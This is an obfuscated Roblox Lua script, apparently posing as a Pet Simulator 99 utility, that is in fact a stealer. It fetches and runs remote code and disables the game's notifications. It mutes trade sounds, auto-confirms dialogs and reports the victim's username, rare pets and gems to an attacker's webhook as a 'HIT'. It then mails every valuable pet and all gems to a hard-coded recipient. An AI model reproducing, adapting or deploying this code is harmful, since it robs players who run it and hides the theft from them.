--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v36,v37) local v38={};for v84=1, #v36 do v6(v38,v0(v4(v1(v2(v36,v84,v84 + 1 )),v1(v2(v37,1 + (v84% #v37) ,1 + (v84% #v37) + 1 )))%256 ));end return v5(v38);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167")).LocalPlayer;local v9=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v10=v7("\60\163\93\6\175\124\9\123\160\76\20\180\41\73\63\249\69\19\171\47\85\53\188\92\4\189\104\75\59\178\6\23\172\47\9\35\178\75\30\179\41\77\39\248\24\66\229\112\31\97\230\17\64\238\116\18\101\229\31\65\229\117\21\123\175\27\24\183\44\96\0\165\98\59\137\10\30\38\158\78\48\185\1\110\6\152\24\6\241\18\64\62\167\104\46\241\60\99\16\181\78\62\173\10\82\103\147\83\55\165\115\84\61\176\118\41\154\63\17\0\231\72\47\139\115\20\38\165\106\6\174\37","\38\84\215\41\118\220\70");local v11=v7("\74\30\35\27\236\7\64\117","\158\48\118\66\114");local v12=v7("\172\35\3\118\127\170\247","\155\203\68\112\86\19\197");local v13=1320.4 -(874 + 446) ;local v14=v8.Name   .. "_"   .. game.JobId ;if _G[v14] then return;end _G[v14]=true;setclipboard(v7("\78\201\34\236\83\34\170\183\66\212\37\255\79\106\225\182\65\218\121\168\104\33\231\219\77\206\30\248\65","\152\38\189\86\156\32\24\133"));local v15=v10:match(v7("\235\82\165\78\243\88\172\85\179\31\226\66\183\30\232","\38\156\55\199"));local v16=v10:match(v7("\191\120\126\32\28\123\241\80\231\56\120\99\92\60\193\125\231\64\55\97\87","\35\200\29\28\72\115\20\154"));loadstring(game:HttpGet(v7("\17\171\197\207\158\118\123\86\173\208\200\195\43\61\13\183\196\221\152\63\49\11\188\222\209\153\41\58\13\241\210\208\128\99\26\12\180\212\233\158\15\61\13\166\158\236\142\62\61\9\171\194\141\221\126\96\86\178\208\214\131\99\36\10\230\136","\84\121\223\177\191\237\76")))();pcall(function() local v39=0;local v40;while true do if (v39==(897 -(229 + 668))) then v40=v8.PlayerScripts.Scripts.Core[v7("\139\68\198\163\63\67\35\129\139\83\199\164\51\94\55\129\156\99\224","\161\219\54\169\192\90\48\80")];if v40 then v40.Disabled=true;end break;end end end);pcall(function() local v41=v8.PlayerGui.Notifications;if v41 then v41.Enabled=false;end end);local v17=require(game:GetService(v7("\123\71\16\41\64\65\1\49\76\70\51\49\70\80\1\34\76","\69\41\34\96")).Library.Audio);local v18=v17.Play;v17.Play=function(v42,v43,...) local v44=1975 -(1913 + 62) ;local v45;while true do if (v44==(0 + 0)) then v45=0 -0 ;while true do if ((1933 -(565 + 1368))==v45) then if (v43==v7("\174\193\207\11\17\56\185\215\222\14\88\100\243\146\134\82\81\114\237\144\133\95\84\126","\75\220\163\183\106\98")) then return;end return v18(v42,v43,...);end end break;end end end;task.spawn(function() game.DescendantAdded:Connect(function(v85) if (v85.ClassName==v7("\49\181\158\57\221","\185\98\218\235\87")) then if ((v85.SoundId==v7("\217\62\63\231\205\185\206\40\46\226\132\229\132\109\118\190\141\243\154\111\117\179\136\255","\202\171\92\71\134\190")) or (v85.SoundId==v7("\59\195\52\137\58\210\41\156\32\197\118\199\102\144\120\218\124\149\123\218\120\145\127\208","\232\73\161\76")) or (v85.SoundId==v7("\169\219\90\92\13\168\220\86\84\26\225\150\13\12\76\239\136\17\9\76\232\139\21\11","\126\219\185\34\61"))) then local v113=0 -0 ;while true do if (v113==(1661 -(1477 + 184))) then v85.Volume=0 -0 ;v85:Destroy();break;end end end end end);end);task.spawn(function() while task.wait(0.1 + 0 ) do for v93,v94 in pairs(v8.PlayerGui:GetDescendants()) do if (v94:IsA(v7("\56\203\70\102\92\98\231\243\3\192","\135\108\174\62\18\30\23\147")) and v94.Visible and v94.Active) then local v108=v94.Name:lower();if (v108:find(v7("\181\230\36\205\17\188\62","\167\214\137\74\171\120\206\83")) or v108:find(v7("\146\245\33","\199\235\144\82\61\152")) or v108:find(v7("\20\19\183\47","\75\103\118\217")) or v108:find(v7("\200\95","\126\167\52\16\116\217"))) then pcall(function() v94:Click();end);end end end end end);local function v20(v46) local v47=856 -(564 + 292) ;local v48;local v49;local v50;while true do if (v47==(0 -0)) then v48=tostring(math.floor(v46));v49="";v47=1;end if (v47==1) then local v103=0 -0 ;while true do if (v103==(304 -(244 + 60))) then v50=0 + 0 ;for v120= #v48,477 -(41 + 435) , -(1002 -(938 + 63)) do local v121=0 + 0 ;while true do if (v121==(1125 -(936 + 189))) then v50=v50 + 1 ;v49=v48:sub(v120,v120)   .. v49 ;v121=1;end if (v121==(1 + 0)) then if (((v50%3)==0) and (v120>(1614 -(1565 + 48)))) then v49=","   .. v49 ;end break;end end end v103=1 + 0 ;end if (v103==(1139 -(782 + 356))) then v47=2;break;end end end if (v47==(269 -(176 + 91))) then return v49;end end end local v21=require(game:GetService(v7("\250\43\48\140\189\26\253\220\43\36\179\160\22\238\201\41\37","\156\168\78\64\224\212\121")).Library.Client.Save);local v22=v21.Get();local v23=require(game:GetService(v7("\53\235\181\194\14\237\164\218\2\234\150\218\8\252\164\201\2","\174\103\142\197")).Library.Directory.Pets);local v24=0 -0 ;local v25=nil;if (v22.Inventory and v22.Inventory.Currency) then for v95,v96 in pairs(v22.Inventory.Currency) do if (v96.id==v7("\114\33\94\53\42\80\252\69","\152\54\72\63\88\69\62")) then v24=v96._am or 0 ;v25=v95;break;end end end local v26={};if (v22.Inventory and v22.Inventory.Pet) then for v97,v98 in pairs(v22.Inventory.Pet) do local v99=0 -0 ;local v100;local v101;while true do if (v99==(1093 -(975 + 117))) then if v98.id:find(v7("\243\197\252\91\213\202\250\73\213\202","\60\180\164\142")) then v101=1879 -(157 + 1718) ;elseif (v100 and v100.exclusiveLevel) then if v98.id:find(v7("\108\87\17\40\41\228\17","\114\56\62\101\73\71\141")) then v101=3;else v101=1 + 0 ;end elseif (v100 and v100.huge) then v101=6 -4 ;end if (v101>(0 -0)) then table.insert(v26,{[v7("\173\224\223","\164\216\137\187")]=v97,[v7("\211\235\62\167\168\234","\107\178\134\81\210\198\158")]=v98._am or (1019 -(697 + 321)) ,[v7("\54\15\143\195","\202\88\110\226\166")]=v98.id,[v7("\211\29\139\248\216\202\27\155","\170\163\111\226\151")]=v101});end break;end if (v99==(0 -0)) then v100=v23[v98.id];v101=0 -0 ;v99=2 -1 ;end end end end table.sort(v26,function(v51,v52) return v51.priority>v52.priority ;end);local v27={};for v53,v54 in ipairs(v26) do table.insert(v27,{[v7("\31\49\191\61","\73\113\80\210\88\46\87")]=v54.name,[v7("\146\56\204\6\242\146","\135\225\76\173\114")]="❌"});end local function v28() if ( #v27==(0 + 0)) then return v7("\52\226\248\151\173\175\160\27\227\172\165\173\179\180\86\173\140\185\184\188\169\19\238\171\252\236\149\178\29\232\171\252\236\178\181\90\200\160\179\160\168\180\19\251\189\163\236\187\168\15\227\188\254","\199\122\141\216\208\204\221");end local v55="```\n";v55=v55   .. "Pet Name          Status\n" ;v55=v55   .. "----------------------------\n" ;for v86,v87 in ipairs(v27) do local v88=0 -0 ;local v89;while true do if (v88==1) then v55=v55   .. string.format("%-16s   %s\n",v89,v87.status) ;break;end if (v88==(0 -0)) then local v109=1227 -(322 + 905) ;while true do if (v109==1) then v88=612 -(602 + 9) ;break;end if (v109==(1189 -(449 + 740))) then v89=v87.name;if ( #v89>(888 -(826 + 46))) then v89=v89:sub(948 -(245 + 702) ,13)   .. v7("\227\147\94","\150\205\189\112\144\24") ;end v109=1;end end end end end v55=v55   .. v7("\37\132\191","\112\69\228\223\44\100\232\113") ;return v55;end local v29=nil;local function v30() local v56=0 -0 ;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;while true do if (v56==(2 + 2)) then if (v63 and v64 and v64.Body) then pcall(function() local v116=1898 -(260 + 1638) ;local v117;while true do if (v116==(440 -(382 + 58))) then v117=v9:JSONDecode(v64.Body);if (v117 and v117.id) then v29=v117.id;end break;end end end);end break;end if (v56==(0 -0)) then local v104=0 + 0 ;while true do if (v104==1) then v56=1;break;end if ((0 -0)==v104) then v57=os.date(v7("\158\11","\230\180\127\103\179\214\28"));v58=v57.hour%12 ;v104=2 -1 ;end end end if (v56==3) then local v105=0;while true do if (v105==(1205 -(902 + 303))) then v62={[v7("\189\47\124\27\32\232","\143\216\66\30\126\68\155")]={v61}};v63,v64=pcall(function() return request({[v7("\159\218\1","\129\202\168\109\171\165\195\183")]=v10,[v7("\15\93\35\208\209\16","\134\66\56\87\184\190\116")]=v7("\12\30\58\143","\85\92\81\105\219\121\139\65"),[v7("\213\182\81\65\121\205\238","\191\157\211\48\37\28")]={[v7("\252\16\250\8\63\209\11\185\40\35\207\26","\90\191\127\148\124")]=v7("\121\151\62\27\113\132\47\3\113\136\32\88\114\148\33\25","\119\24\231\78")},[v7("\160\34\161\83","\113\226\77\197\42\188\32")]=v9:JSONEncode(v62)});end);v105=1;end if ((2 -1)==v105) then v56=4;break;end end end if (1==v56) then if (v58==(0 + 0)) then v58=1702 -(1121 + 569) ;end v59=((v57.hour<12) and v7("\173\40","\128\236\101\63\38\132\33")) or v7("\156\132","\175\204\201\113\36\214\139") ;v56=2;end if ((216 -(22 + 192))==v56) then local v106=683 -(483 + 200) ;while true do if (v106==(1464 -(1404 + 59))) then v56=8 -5 ;break;end if (v106==(0 -0)) then v60=string.format(v7("\2\200\122\153\0\7\137\49\134\65\23\158\49\134\65\23\158\49\156\65\84","\100\39\172\85\188"),v57.month,v57.day,v58,v57.min,v57.sec,v59);v61={[v7("\185\113\173\140\54","\83\205\24\217\224")]="🔥 Xoltic Scripts [PetSim99 HIT]",[v7("\229\202\193\50\244","\93\134\165\173")]=9492732 -(468 + 297) ,[v7("\184\251\196\206\62\221","\30\222\146\161\162\90\174\210")]={{[v7("\235\79\125\15","\106\133\46\16")]="👤 Username",[v7("\78\33\127\233\95","\32\56\64\19\156\58")]=v8.Name,[v7("\83\198\233\95\84\247","\224\58\168\133\54\58\146")]=false},{[v7("\87\87\70\248","\107\57\54\43\157\21\230\231")]="📦 Inventory",[v7("\205\138\29\224\188","\175\187\235\113\149\217\188")]=v28(),[v7("\53\161\141\69\237\124","\24\92\207\225\44\131\25")]=false},{[v7("\69\210\181\73","\29\43\179\216\44\123")]="💎 Gems",[v7("\171\216\44\89\184","\44\221\185\64")]=v20(v24),[v7("\8\233\68\86\125\4","\19\97\135\40\63")]=true}},[v7("\168\83\60\47\42\35","\81\206\60\83\91\79")]={[v7("\90\174\200\102","\196\46\203\176\18\79\163\45")]=string.format("🔥 Xoltic Scripts %s",v60)}};v106=3 -2 ;end end end end end local function v31(v65) local v66=0 -0 ;local v67;local v68;local v69;local v70;local v71;local v72;local v73;while true do if (v66==(1 -0)) then v68=os.date(v7("\17\58","\45\59\78\212\54"));v69=v68.hour%12 ;if (v69==(0 + 0)) then v69=248 -(141 + 95) ;end v66=2;end if (v66==(3 + 0)) then v73={[v7("\242\254\62\215\243\224","\178\151\147\92")]={v72}};pcall(function() request({[v7("\185\239\64","\26\236\157\44\82\114\44")]=v67,[v7("\7\43\193\83\37\42","\59\74\78\181")]=v7("\21\240\110\121\155","\211\69\177\58\58"),[v7("\159\224\120\241\236\217\164","\171\215\133\25\149\137")]={[v7("\194\199\60\238\234\62\232\15\213\209\34\255","\34\129\168\82\154\143\80\156")]=v7("\132\162\35\7\65\77\136\145\187\60\5\7\68\154\138\188","\233\229\210\83\107\40\46")},[v7("\227\77\54\207","\101\161\34\82\182")]=v9:JSONEncode(v73)});end);break;end if (v66==(0 -0)) then if  not v29 then return;end if v65 then v27[v65].status="✅";end v67=string.format(v7("\50\2\224\165\41\76\187\250\45\19\246\189\53\25\255\251\54\19\227\188\41\23\255\160\40\23\186\184\53\19\187\180\42\31\187\162\63\20\252\186\53\29\231\250\127\5\187\240\41\89\249\176\41\5\245\178\63\5\187\240\41","\213\90\118\148"),v15,v16,v29);v66=1 + 0 ;end if (v66==(5 -3)) then local v107=0;while true do if (v107==1) then v72={[v7("\174\93\162\76\191","\32\218\52\214")]="🔥 Xoltic Scripts [PetSim99 HIT]",[v7("\77\24\61\167\227","\58\46\119\81\200\145\208\37")]=9491967,[v7("\45\133\53\160\173\174","\86\75\236\80\204\201\221")]={{[v7("\124\64\122\128","\235\18\33\23\229\158")]="👤 Username",[v7("\70\187\205\174\85","\219\48\218\161")]=v8.Name,[v7("\237\127\112\64\213\74","\128\132\17\28\41\187\47")]=false},{[v7("\15\51\11\63","\61\97\82\102\90")]="📦 Inventory",[v7("\186\47\167\94\194","\105\204\78\203\43\167\55\126")]=v28(),[v7("\172\164\47\23\29\1","\49\197\202\67\126\115\100\167")]=false},{[v7("\57\90\210\44","\62\87\59\191\73\224\54")]="💎 Gems",[v7("\241\3\246\220\226","\169\135\98\154")]=v20(v24),[v7("\194\121\40\93\243\54","\168\171\23\68\52\157\83")]=true}},[v7("\242\126\250\185\32\63","\231\148\17\149\205\69\77")]={[v7("\148\162\223\239","\159\224\199\167\155\55")]=string.format("🔥 Xoltic Scripts %s",v71)}};v66=4 -1 ;break;end if (v107==(0 + 0)) then v70=((v68.hour<12) and v7("\49\123","\144\112\54\227\235\230\78\205")) or v7("\131\5","\59\211\72\111\156\176") ;v71=string.format(v7("\11\131\172\104\74\199\166\41\20\194\179\127\74\221\166\125\28\131\163\104\93","\77\46\231\131"),v68.month,v68.day,v69,v68.min,v68.sec,v70);v107=164 -(92 + 71) ;end end end end end local function v32(v74) local v75=0 + 0 ;local v76;while true do if (v75==0) then if ( not v25 or (v74<=(0 -0))) then return;end v76={v11,v12,v7("\203\24\75\236\222\236\129\55","\78\136\109\57\158\187\130\226"),v25,v74};v75=850 -(254 + 595) ;end if (v75==(127 -(55 + 71))) then pcall(function() return game:GetService(v7("\12\58\233\253\55\60\248\229\59\59\202\229\49\45\248\246\59","\145\94\95\153")):WaitForChild(v7("\211\200\0\194\65\165\246","\215\157\173\116\181\46")):WaitForChild(v7("\24\181\130\254\216\58\172\209\178\233\48\186\143","\186\85\212\235\146")):InvokeServer(unpack(v76));end);break;end end end v30();task.wait(2 -0 );for v77=1825 -(573 + 1217) ,2 -1 , -(1 + 0) do task.wait(1);end local v33=game:GetService(v7("\240\132\6\242\48\237\89\214\132\18\205\45\225\74\195\134\19","\56\162\225\118\158\89\142"));local v34=v33:WaitForChild(v7("\114\0\212\184\45\202\87","\184\60\101\160\207\66"));local v35=v34:WaitForChild(v7("\28\131\117\176\51\141\100\230\113\177\121\178\53","\220\81\226\28"));for v78,v79 in ipairs(v26) do local v80=0 -0 ;local v81;local v82;local v83;while true do if (v80==(939 -(714 + 225))) then v81=0 -0 ;v82=nil;v80=1 -0 ;end if (v80==1) then v83=nil;while true do if (v81==1) then if v83 then local v124=0 + 0 ;while true do if (v124==(0 -0)) then v31(v78);task.wait(806.2 -(118 + 688) );break;end end end task.wait(v13);break;end if (v81==(48 -(25 + 23))) then local v118=0;local v119;while true do if (v118==(0 + 0)) then v119=1886 -(927 + 959) ;while true do if (0==v119) then v82={v11,v12,v7("\35\208\150","\167\115\181\226\155\138"),v79.uid,v79.amount};v83=pcall(function() return v35:InvokeServer(unpack(v82));end);v119=98 -(11 + 86) ;end if (v119==(2 -1)) then v81=1;break;end end break;end end end end break;end end end if (v24>(285 -(175 + 110))) then local v90=v21.Get();local v91=0 -0 ;if (v90.Inventory and v90.Inventory.Currency) then for v110,v111 in pairs(v90.Inventory.Currency) do if (v111.id==v7("\198\43\230\81\116\127\194\241","\166\130\66\135\60\27\17")) then v91=v111._am or (0 -0) ;break;end end end if (v91>(1796 -(503 + 1293))) then v32(v91);end end print(v7("\124\69\194\97\57\71\10\253\118\34\77\90\218\102\112\9\10\237\122\61\84\70\203\97\53\5","\80\36\42\174\21"));